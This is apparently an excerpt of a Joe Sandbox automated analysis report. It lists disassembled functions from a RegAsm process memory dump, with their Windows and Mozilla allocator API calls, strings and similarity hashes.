                                                                            • Opcode ID: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                            • Instruction ID: 22c0f6446ab873f43d50a64293b96aeef2e6e76e590fc671d4a1a890a38f3f90
                                                                            • Opcode Fuzzy Hash: 44fda56f94a84bc78a2f28d8a827dcd1ec677aaf2bede1531f218c491d51a28f
                                                                            • Instruction Fuzzy Hash: D44180796016549FCB10CFA5C880A9BBBF1FF49318F40451DE95A93B50EB31E815CFA5
                                                                            Function 6CC47E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC47EA7
                                                                            • malloc.MOZGLUE(00000001), ref: 6CC47EB3
                                                                              • Part of subcall function 6CC4CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC4CB49
                                                                              • Part of subcall function 6CC4CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC4CBB6
                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC47EC4
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC47F19
                                                                            • malloc.MOZGLUE(?), ref: 6CC47F36
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC47F4D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                            • String ID: d
                                                                            • API String ID: 204725295-2564639436
                                                                            • Opcode ID: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                            • Instruction ID: b889903a3ecdc4c8aa6a2d9b55165ef10a0482e4a8d708589b91b3302115cd16
                                                                            • Opcode Fuzzy Hash: 2f887633605dacda3c39dff14492903448098281593e64e40e4ad912cf8322ef
                                                                            • Instruction Fuzzy Hash: 55310861E0474897EB009BA8DC449FEB778EF96308F049369ED4957612FB31A9C8C390
                                                                            Function 6CC43E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CC43EEE
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43FDC
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CC44006
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC440A1
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440AF
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC440C2
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC44134
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44143
                                                                            • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CC43CCC), ref: 6CC44157
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Free$Heap$StringUnicode$Allocate
                                                                            • String ID:
                                                                            • API String ID: 3680524765-0
                                                                            • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                            • Instruction ID: 14fd4fb397468fd9184bf2fffdb0c221c118ec1c83516fd763b5dbf68b263557
                                                                            • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                            • Instruction Fuzzy Hash: 57A172B1A00215CFEB40CF69C880659B7F5FF88314F29C599D909AF752E772D856CBA0
                                                                            Function 6CC32030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,6CC53F47,?,?,?,6CC53F47,6CC51A70,?), ref: 6CC3207F
                                                                            • memset.VCRUNTIME140(?,000000E5,6CC53F47,?,6CC53F47,6CC51A70,?), ref: 6CC320DD
                                                                            • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6CC53F47,6CC51A70,?), ref: 6CC3211A
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32145
                                                                            • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6CC53F47,6CC51A70,?), ref: 6CC321BA
                                                                            • EnterCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC321E0
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE744,?,6CC53F47,6CC51A70,?), ref: 6CC32232
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                            • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                            • API String ID: 889484744-884734703
                                                                            • Opcode ID: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                            • Instruction ID: 204fc627109df70c3c88df9551e345408041ca825da1858674256c2b6f525715
                                                                            • Opcode Fuzzy Hash: c76313d9b5fe5cbf03be54c1b3f779727829591991bc0595671f8275b7cc2475
                                                                            • Instruction Fuzzy Hash: 9861D331F002268FCF04CAA9DDA9B6E76B1AF85314F294239E528A7A95F7719C00C7C5
                                                                            Function 6CC348E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6CC7483A,?), ref: 6CC34ACB
                                                                            • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6CC7483A,?), ref: 6CC34AE0
                                                                            • moz_xmalloc.MOZGLUE(FFFE15BF,?,6CC7483A,?), ref: 6CC34A82
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6CC7483A,?), ref: 6CC34A97
                                                                            • moz_xmalloc.MOZGLUE(15D4E801,?,6CC7483A,?), ref: 6CC34A35
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6CC7483A,?), ref: 6CC34A4A
                                                                            • moz_xmalloc.MOZGLUE(15D4E824,?,6CC7483A,?), ref: 6CC34AF4
                                                                            • moz_xmalloc.MOZGLUE(FFFE15E2,?,6CC7483A,?), ref: 6CC34B10
                                                                            • moz_xmalloc.MOZGLUE(8E8E0022,?,6CC7483A,?), ref: 6CC34B2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                            • String ID:
                                                                            • API String ID: 4251373892-0
                                                                            • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                            • Instruction ID: 6891b6da4bcde1f6712743714a6eeca5b4cc3b6490a889f9630283d82afbf301
                                                                            • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                            • Instruction Fuzzy Hash: E0715BB19007069FC754CF69D580AAABBF5FF09308B10863ED15A9BB51F732E995CB80
                                                                            Function 6CC89D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC88273), ref: 6CC89D65
                                                                            • free.MOZGLUE(6CC88273,?), ref: 6CC89D7C
                                                                            • free.MOZGLUE(?,?), ref: 6CC89D92
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC89E0F
                                                                            • free.MOZGLUE(6CC8946B,?,?), ref: 6CC89E24
                                                                            • free.MOZGLUE(?,?,?), ref: 6CC89E3A
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC89EC8
                                                                            • free.MOZGLUE(6CC8946B,?,?,?), ref: 6CC89EDF
                                                                            • free.MOZGLUE(?,?,?,?), ref: 6CC89EF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 956590011-0
                                                                            • Opcode ID: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                            • Instruction ID: 4a635acd91bfd117a0395710259883c8385e3520b466af2a8eec46a4ff0ec448
                                                                            • Opcode Fuzzy Hash: a73661cf76e04e04c3314912db0c496f9f0db4acfd5adc7d1b40183cf7e6ee5a
                                                                            • Instruction Fuzzy Hash: B9719EB090AB418BC712CF18C48055BFBF4FF99319B448659E89A5BB02FB30F895CB95
                                                                            Function 6CC8DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC8DDCF
                                                                              • Part of subcall function 6CC6FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC6FA4B
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC890FF
                                                                              • Part of subcall function 6CC890E0: free.MOZGLUE(?,00000000,?,?,6CC8DEDB), ref: 6CC89108
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE0D
                                                                            • free.MOZGLUE(00000000), ref: 6CC8DE41
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DE5F
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEA3
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC8DEE9
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF32
                                                                              • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DB86
                                                                              • Part of subcall function 6CC8DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DC0E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC7DEFD,?,6CC44A68), ref: 6CC8DF65
                                                                            • free.MOZGLUE(?), ref: 6CC8DF80
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                            • String ID:
                                                                            • API String ID: 112305417-0
                                                                            • Opcode ID: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                            • Instruction ID: b89c7cf48a436d5ee1bb91cefaf3e392a48f23cd081337e61372806747c15651
                                                                            • Opcode Fuzzy Hash: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                            • Instruction Fuzzy Hash: 9651C7727026029BD7119F18D8806AFB772BF9131CF95011ED45A53B00F731F85ACBA2
                                                                            Function 6CC95D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D32
                                                                            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D62
                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D6D
                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D84
                                                                            • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DA4
                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DC9
                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC95DDB
                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E00
                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E45
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                            • String ID:
                                                                            • API String ID: 2325513730-0
                                                                            • Opcode ID: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                            • Instruction ID: fb7876f300e37f58bd7c90a59601ddad3c929e030b0e8c0298208de06f187c6d
                                                                            • Opcode Fuzzy Hash: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                            • Instruction Fuzzy Hash: 5941C2757002058FCB00DFA5C9D8AAE77B5FF89319F0441A8E50697791EB35EC06CB60
                                                                            Function 6CC6CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC331A7), ref: 6CC6CDDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                            • API String ID: 4275171209-2186867486
                                                                            • Opcode ID: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                            • Instruction ID: 7986fe24accd01d142f8e5c75f5376e31a01c2699bf7f5f4bf737bb9bf9e6cb9
                                                                            • Opcode Fuzzy Hash: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                            • Instruction Fuzzy Hash: 4431A331B442055BEF10AFEA8DD5B6E7B75BF41B58F204019F610ABE80FB70E4018BA5
                                                                            Function 6CC3BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC3BC03
                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3BD06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                            • String ID: 0$0$y
                                                                            • API String ID: 2811501404-3020536412
                                                                            • Opcode ID: bbd5dac25041263a6675eb4c07bb636c29fc8877f2ac0aa4797e370f726d60e4
                                                                            • Instruction ID: 6650441275dc40e5480a8a6b202beb377a9e82d9bab949b8702c5fef6da26026
                                                                            • Opcode Fuzzy Hash: bbd5dac25041263a6675eb4c07bb636c29fc8877f2ac0aa4797e370f726d60e4
                                                                            • Instruction Fuzzy Hash: 3461E371A08B548FC710CF29E4A1A5BB7E5FFC9348F00562EF88997641FB30D9498782
                                                                            Function 6CC3ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                              • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                            • moz_xmalloc.MOZGLUE(00000012), ref: 6CC3ED50
                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC3EDAC
                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC3EDCC
                                                                            • CreateFileW.KERNEL32 ref: 6CC3EE08
                                                                            • free.MOZGLUE(00000000), ref: 6CC3EE27
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC3EE32
                                                                              • Part of subcall function 6CC3EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC3EBB5
                                                                              • Part of subcall function 6CC3EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CC6D7F3), ref: 6CC3EBC3
                                                                              • Part of subcall function 6CC3EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CC6D7F3), ref: 6CC3EBD6
                                                                            Strings
                                                                            • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC3EDC1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                            • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                            • API String ID: 1980384892-344433685
                                                                            • Opcode ID: 16ad29734e63e0849865ad23842afd8107fa41eaa2676d7c1b81d95605e19852
                                                                            • Instruction ID: 354f9080f5a777a7a32b0881fcf449c7172278be4387c5a7896af4fb334c207f
                                                                            • Opcode Fuzzy Hash: 16ad29734e63e0849865ad23842afd8107fa41eaa2676d7c1b81d95605e19852
                                                                            • Instruction Fuzzy Hash: 7C51E171D052248BDB01DF69E8447EEB7B0AF49318F44946DE8596B780FB306D48CBE2
                                                                            Function 6CC40A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(0000000C,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40A72
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • moz_xmalloc.MOZGLUE(?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40AF5
                                                                            • free.MOZGLUE(00000000,?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40B9F
                                                                            • free.MOZGLUE(?,?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40BDB
                                                                            • free.MOZGLUE(00000000,?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40BED
                                                                            • mozalloc_abort.MOZGLUE(alloc overflow,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40C0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                            • String ID: alloc overflow
                                                                            • API String ID: 1471638834-749304246
                                                                            • Opcode ID: 859adedcc3abfefc8c697cbfd19dfd95dff47f8ab411ca817a95692beeed9c8d
                                                                            • Instruction ID: 6d664f920f14fccc44d4af032bba0ff120b6f04a5444011e68354525be8f617a
                                                                            • Opcode Fuzzy Hash: 859adedcc3abfefc8c697cbfd19dfd95dff47f8ab411ca817a95692beeed9c8d
                                                                            • Instruction Fuzzy Hash: E351C0B0A446468FDB14CF58C880B5EB3B5FF54308F14C96DC84A9BA01FB71A555CB51
                                                                            Function 6CCAA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA565
                                                                              • Part of subcall function 6CCAA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCAA4BE
                                                                              • Part of subcall function 6CCAA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CCAA4D6
                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA65B
                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CCAA6B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
